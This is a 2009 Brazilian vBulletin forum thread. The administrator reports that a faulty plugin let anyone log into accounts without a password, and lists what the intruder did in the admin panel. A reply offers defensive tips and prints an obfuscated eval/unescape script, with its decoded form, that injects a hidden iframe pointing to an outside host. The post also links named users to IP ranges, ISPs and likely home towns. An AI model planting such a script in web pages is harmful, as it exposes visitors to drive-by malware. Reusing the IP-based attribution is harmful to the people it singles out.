Secret Experience

Secret Experience (https://secretexperience.net/)
-   Boletins Informativos (https://secretexperience.net/boletins-informativos/)
-   -   Falha de Segurança em 05/10/2009 (https://secretexperience.net/boletins-informativos/14189-falha-de-seguranca-em-05-10-2009-a.html)

Setokaiba 06-10-2009 03:50 PM

Falha de Segurança em 05/10/2009
 
Bom dia, boa tarde ou boa noite, isto irá depender do horário em que esteja visualizando esta mensagem.

Este boletin informativo tem o intuito de informar o ocorrido na data antecedente a deste tópico.
A instalação de um plugin (mod) resultou na falha de sistema que permitiu com que fosse efetuado acesso com quaisquer contas exceto a minha, sem a necessidade da inserção da senha, tanto na interface index e demais do fórum, como no painel de controle da administração (AdminCP).

Fomos alertados pelo usuário de que estava sendo possível tal feito, logo a notícia se espalhou e sofremos uma tentativa lammer, que nos causou mínimos danos mas não menos importantes.

Uma vulnerabilidade foi encontrada. O plugin ao meu ver não possuia malícia, e sim um erro de programação que permitia vunerabilidade as contas sendo permitindo o exploit que possibilitava o uso da sua conta para outros fins.

Isso fez com que sua conta possa ter sido usada sem seu conhecimento ou permissão, e as ações sejam executadas em seu nome.

Contas vulneráveis podem ainda ser ruim para o fórum como um todo, pois elas podem permitir acesso de ferramentas automáticas para enviar spam aos fóruns e outras contas de usuário, usando seu nome.

Lista de OcorrênciasNessa nossa lista de aventuras do lammer encontramos o seguinte:
Todos os IP's com (2001.88.219.169) condizem com nossa excelência, fazendo o uso da conta do administrador LolMaster.
Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

Email.php (Genlist) significa que nosso sagaz aventureito clicou na parte de envio de e-mail em massa para todos os usuários do fórum, se fosse um pouco inteligente, ou se talvez caísse nas mãos alheias, dos que se intitulam concorrência, poderia gerar um spammer via e-mail para todos os usuários, só que tem que essa tarefa não foi executada. Creio que nosso Richard não sabia para que servia.
Banning.php (dobanuser) Tentativa de banimento do diretor Marreta~, esta sem sucesso, até porque isto gera uma mensagem de erro, pois o mesmo se encontra num grupo protegido e somente minha conta pode baní-lo.
(Você não está autorizado à banir usuários que não são considerado normais, usuários registrados).
subscriptions.php É relacionado as assinaturas pagas do fórum, no caso de um fórum privado onde fosse necessário efetuar pagamento para acessar, accho que dessa vez nosso Robin Wood pensou ter achado o cofre da Secret Experience, e foi com muita sede ao pote, pena que lá em fórum público não serve para nada, e não possui nenhum dado. Talvez se fosse o cofre ele roubaria para dar aos XPZonas opss...pobres, para comprar uma licença vBulletin (perco o amigo, mas não perco a piada).:laugh:
xperience_admin.php (manshop) Dessa vez nosso aventureiro pensou mais alto, e partiu para o lado da loja do fórum, acho que ele deve ter pensado que lá vendia as camisas da SE, pena que se deparou com os ícones de shop do vBExperience. :daydreaming:

Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

banning.php (dobanuser) Desta vez ele foi sagaz e acabou por banir duas contas, Tody e a conta Boots nesta última pois o seguinte motivo (você foi considerado boiola demais para participar deste fórum) pelo modo de escrita já suspeito de quem tenha sido.
Quem lhe dá diariamente com postagens por todas as partes do fórum, acaba conhecendo o modo de escrita dos usuários, se são analfabetos ou não, se erram acentos e etc.
post_thanks_admin.php (delete_all_users_tha) dessa vez ele acessou a parte responsável por deletar todos os obrigados de um determinado usuário, só que esse determinado usuário deve ser identificado pro ID, como a massa cefálica de nosso vilão era pouca, não soube achar o ID do membro, com isso nada soube fazer, (é o admincp é um pouco complicado pra quem nunca o viu).
Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

options.php (options) É responsável pelas configurações gerais do forum, como o nome do fórum, o direcionamento, os cookies, configurações de estilo e idioma, configurações de mods e afins, mas acho que nosso amigo achou muito extensa a lista e preferiu clicar em outro lugar, tudo isso em menos de um minuto, até vejo o desespero dele clicando em tudo quanto é lugar, assustado por ter entrado no adminCP e também por estar num lugar onde seus conhecimentos eram nulos.
Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

user.php (find) (kill) Essa parte é responsável pela edição do usuário, nela que editamos assinaturas irregulares, colocamos em grupos, banimos diretamente e etc. Nosso aventureiro achou a opção deletar usuário, e com isso deletou o usuário que desejada, pois o (find) significa buscar, encontrar, e pesquisando por Tody, achou o deletou a conta que é a 1465, acho que ele deve ter algo contra o cara aí.
Até então nada que não fosse irreversível ou necessitasse restaurar o backup.
Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

Aqui uma breve pesquisa pelo IP do LolMaster, e podemos ver que ele é um usuário Velox, pois inicia-se com 189.
Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

Um rápido resolve hostname comprova isto.
Spoiler
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

Já o nosso campeão de tentativas frustadas, é um usuário Brasil Telecom.
E reside em Goiás, talvez em Goiânia, ou próximo a cidade de Hidrolândia.
Aqui nessa imagem tenho a lista de suspeitos que podem ter praticado tal ação.
JotaH Acho que não é suspeito :laugh: mas mora em Goiás e por isso localizeias proximidades, e ele é vizinho do nosso amigão que fez isso.
KetChup Este não efetua login desde 28/09/2009. A data que instalei esse mod, e também do ocorrido é muito adiante a data deste último login.
ita3000 Somente se registrou e não voltou desde 01/09/2009.
GoBack Possui a última faixa de IP relacionada ao do usuário da conta do LolMaster, num resete apenas mudaria a última numeração, como é perceptível na imagem. Por coincidência a do JotaH também possui a mesma faixa, isso é dado devido serem usuários da mesma caixa (nome dado aos técnicos e cabistas) onde ficam as linhas telefônicas com sinal ADSL. GoBack, antes se chamava lionhard, nome alterado pelo JotaH, o que comprova a proximidade residencial, pois provavelmente o pedido foi efetuado via messenger, pois não me recordo de nenhuma mp direcionada ao JotaH com tal assunto.
E para nossa surpresa maior, o primeiro a informar sobre este problema foi o GoBack, informou ao JotaH.:laugh: Ou até onde eu sei, era o único que soube disso, até porque não é comum ninguém ficar tentando logar com a conta de ninguém, por causa do strike que dá uma punição de 15 minutos após 5 tentativas incorretas.
Bom, não causou danos maiores e agradeço por ter reportado isso.


Meus caros, imagens valem mais do que palavras, tirem suas conclusões.
Algo que foi pouco inteligente, caso tivésse logado com a conta Jinrox poderia ter roubado a XML da skin. :twitcy:
Nosso sistema não detectou múltiplo login, até porque quem fez sabe que esse sistema existe e sabe como burlar.
Ou melhor, burlou por cagada, porque ele não falha nunca:
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

Pedimos desculpas por qualquer incoveniência que isso possa ter causado e pedimos a sua compreensão.

Tudo de Bom,
Secret Experience - Welcome To The World

macabriNn 10-10-2009 06:05 AM

Citação:

xperience_admin.php (manshop) Dessa vez nosso aventureiro pensou mais alto, e partiu para o lado da loja do fórum, acho que ele deve ter pensado que lá vendia as camisas da SE, pena que se deparou com os ícones de shop do vBExperience.
Hudhsuhsdu essa foi boa


Anderson verifique sempre os arquivos php do mod. Geralmente as vunerabilidades estao onde vc nem imagina

*iframes que direcionam para outros sites
*meta em if ou meta em head
*verificar todos os includes e execs
*js, css, e styles nao possue esses tipos de falhas


Veja um exemplo de um script malicioso dentro de um arquivo PHP

Criptado:
Citação:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74 %61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6 d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61% 6d%65%20%6e%61%6d%65%3d%39%20%73%72%63%3d%5c%27%68 %74%74%70%3a%2f%2f%39%37%37%33%39%38%35%33%30%3f%2 7%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68% 2e%72%61%6e%64%6f%6d%28%29%2a%39%30%37%30%36%29%2b %27%32%37%66%31%5c%27%20%77%69%64%74%68%3d%32%36%3 6%20%68%65%69%67%68%74%3d%33%34%31%20%73%74%79%6c% 65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65 %5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));</script>
descriptado e tradusido:

Citação:

window.status='Done';document.write('<iframe name=9 src=\'http://977398530?'+Math.round(Math.random()*90706)+'27f1\ ' width=266 height=341 style=\'display: none\'>')
veja o iframe maldito ai

Algumas ferramentas que irao te ajudar a localizar as vunerabilidades


Citação:

Analog-X Script Defender
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] ... defend.htm
EBURGER Windows Security

[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]
HTAstop (este programa habilita/desabilita o Windows Script Host)
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

NoScript (este programa habilita/desabilita o Windows Script Host)
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] ... sting.html

WormGuard
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

ScripTrap (Recomendado)
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

ScriptSentry (Recomendado)
(anteriormente conhecido como WatchDog)
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

VBSDefender
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]

Volto Interceptor
[Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar]
Procure tbm verificar se seu host possui segurança nv 5 ou se usa cpanel procure abilitar segurança para php

Setokaiba 10-10-2009 10:57 PM

Baixo os mods diretamente do vBulletin.org não existe riscos quanto a exploit ou lammers.
Isso não passou de uma falha devido a XSS, inclusive o meu alerta forçou até o upgrade do vBulletin.

Fernando xD 14-10-2009 05:22 PM

kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk, Quase murri de rir aki da parte q o seto disse : Como a massa cefálica do nosso vilao era pouca kkkkkkk, E quando nosso amigo seto disse: Talvez se fosse o cofre ele roubaria para dar aos XPZonas opss...pobres, para comprar uma licença vBulletin, kkkk é como o seto disse:Percoo Amigo mas nao perco a piada kkkkk, mas isso ta bem na cara ne gente, Quem fikaria tentando discobrir senhas de usuarios mais bem sucedidos aki no forum, por datas de aniversario,nomes de pai.mae,namorada kkk, é cada coisa q eu vejo !!!! :nah::nah::nah::nah::twitcy::twitcy::rungun:


Horários baseados na GMT -3. Agora são 09:33 AM.

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.